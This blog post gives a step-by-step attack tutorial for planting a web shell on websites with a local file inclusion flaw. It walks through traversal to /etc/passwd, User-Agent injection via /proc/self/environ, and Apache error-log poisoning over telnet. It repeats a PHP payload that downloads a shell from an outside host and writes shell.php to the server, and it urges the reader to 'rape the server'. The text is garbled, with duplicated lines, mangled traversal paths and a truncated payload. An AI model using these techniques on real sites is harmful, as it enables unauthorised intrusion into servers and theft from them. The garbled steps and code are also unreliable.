Assalam O Alikum Friends,..
Today I Am Going To Teach You Two Ways Of Uploading Shell Via LFI Vulnerability
Requirement:- website vul to lfi.
MethoD 1:-
NOTE: You will need FireFox and its
addon Tamper Data to do this
method! :)
addon Tamper Data to do this
method! :)
LFI or Local File Inclusion allows you
to include a local file(which means,
that the file is stored on the server)
and run it in a webscript.
to include a local file(which means,
that the file is stored on the server)
and run it in a webscript.
In this method we are going to
upload a shell by accessing the proc/self/environ.
upload a shell by accessing the proc/self/environ.
Now we have our page:-
http://www.target.com/index.php?
include=register.php
include=register.php
And now we are going to do this:-
http://www.target.com/index.php?
include=../
include=../
If it gives you an error message , this
is good. Best thing that can happen is, it says "No such file or directory".
is good. Best thing that can happen is, it says "No such file or directory".
But anyways, now add this to your url:-
http://www.target.com/index.php?
include=../etc/passwd
include=../etc/passwd
And as long as there is no text other
than an error message on the page,
keep adding "../" to the URL, so it would be like:
than an error message on the page,
keep adding "../" to the URL, so it would be like:
http://www.target.com/index.php?
include=.../passwd
include=.../passwd
http://www.target.com/index.php?
include=.../passwd
include=.../passwd
http://www.target.com/index.php?
include=.../passwd
include=.../passwd
And so on. Now let's say we got to this URL:-
http://www.target.com/index.php?
include=.../passwd
include=.../passwd
And we see some huge shitty text we
can not handle with. Now change the
etc/passwd in the URL to proc/self/environ so it would look like this:
can not handle with. Now change the
etc/passwd in the URL to proc/self/environ so it would look like this:
http://www.target.com/index.php?
include=...environ
include=...environ
If you see some text, you did good, if
you see an error message you did
bad. Now this is the point where we
use Tamper Data. Start you Tamper
and reload the page, and for user
agent you type in the following PHP script:-
you see an error message you did
bad. Now this is the point where we
use Tamper Data. Start you Tamper
and reload the page, and for user
agent you type in the following PHP script:-
PHP Code:-
("shell.php" ,"w
+"); $stream = fopen ( "http://
www.website.com/
yourshell.txt" , "r" ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>
This will execute the PHP script on
the site and create a shell.php on the
server. Why? Because the user agent
is being displayed on the webpage,
and if you put in a webscript for that, it will execute it.
the site and create a shell.php on the
server. Why? Because the user agent
is being displayed on the webpage,
and if you put in a webscript for that, it will execute it.
Now simply access your shell by going to
http://www.taget.com/shell.php
And rape the server.
Now LFI method 2:-
NOTE: This only works on apache servers!
Alright you get back to the point
where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd,
you will try to get access to apache/
logs/error.log
where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd,
you will try to get access to apache/
logs/error.log
If you have a brain, you should know
how to do that, since it's EXACTLY
the same method as on etc/passwd
(explained in LFI method 1).
how to do that, since it's EXACTLY
the same method as on etc/passwd
(explained in LFI method 1).
Now when you have found the file,
open up cmd and type in
Code:
open up cmd and type in
Code:
telnet http://www.tagrget.com
80
80
When you are inside the telnet, you
copy the following code (you use your
own shell url:
copy the following code (you use your
own shell url:
PHP Code:
("shell.php" ,"w
+"); $stream = fopen ( "http://
www.website.com/
yourshell.txt" , "r" ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>
Paste it into the telnet window, and
press enter once or maybe twice(until
you get an error message).
press enter once or maybe twice(until
you get an error message).
Now refresh the page in the browser
(error.log) once and there you go.
(error.log) once and there you go.
The PHP script will be executed and
your shell will get uploaded to the
server.
Access it by typing in the
following into your browser:-
your shell will get uploaded to the
server.
Access it by typing in the
following into your browser:-
http://www.taget.com/shell.php
ENJOY...
Muhammad Shahbaz (17 Years Old) is a Young blogger, SEO Expert, & Cyber Security Expert from Pakistan 
0 Comments:
Post a Comment
If you're having issues, Please leave an email address I can contact you on -
I advise you to also "subscribe to the comment feed" and get email updates when I respond to your question.
Hyperlinks are not allowed, Spam/advertising comments will NEVER BE TOLERATED and will be deleted immediately!
Thanks for reading,
Administrator Of FOCSoft